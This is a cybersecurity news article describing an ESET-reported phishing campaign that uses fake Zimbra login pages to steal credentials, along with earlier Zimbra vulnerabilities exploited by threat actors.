A new phishing campaign targeting users of the Zimbra Collaboration email servers has been spotted, and researchers are saying it’s quite successful.
Zimbra Collaboration is a online collaborative suite that comes with an email server and a web client.
According to researchers from ESET, cybercriminals started sending phishing emails to victims at random in April 2023, in an attempt to obtain login credentials for the service.
Fake login page
In these emails, the attackers assume the identity of the victim organization’s administrator, and tell the recipient that their email server is about to be updated. This update will make the email inbox inaccessible, and possibly result in termination.
To make sure that doesn’t happen, the victim is advised to open the HTML file that is attached to the email and review the instructions found there.
The attachment, however, holds no instructions. Instead, it shows a fake Zimbra login page with the username prefilled, where users can type in their passwords. These are then sent to the attacker’s server via an HTTPS POST request.
In some cases, ESET further stated, the attackers would use previously compromised admin accounts to create new accounts on Zimbra servers for phishing email distribution, further adding to the perceived legitimacy of the emails. They’re saying that the campaign is hardly sophisticated, but its results are “impressive”.
According to BleepingComputer, Zimbra Collaboration email servers are “commonly” targeted by cybercriminals. They use them for cyber espionage, collecting internal company communications. They can also sometimes use them as an initial point of breach, to further move laterally throughout the target network.
One such scenario happened earlier this year, when a Russian threat actor abused a vulnerability in the tool (CVE-2022-27926) to snoop on emails belonging to organizations aligned with the North Atlantic Treaty Organization (NATO). Governments, diplomats, and military personnel were also targeted, the publication said.
Another attack occurred in October 2022, when more than 900 servers were hacked thanks to a Zimbra zero-day. Kaspersky labeled the flaw as a remote code execution vulnerability that allows threat actors to send an email with a malicious file that deploys a webshell in the Zimbra server without triggering an antivirus alarm. It is now tracked as CVE-2022-41352 and some researchers claim as many as 1,600 servers were compromised as a result.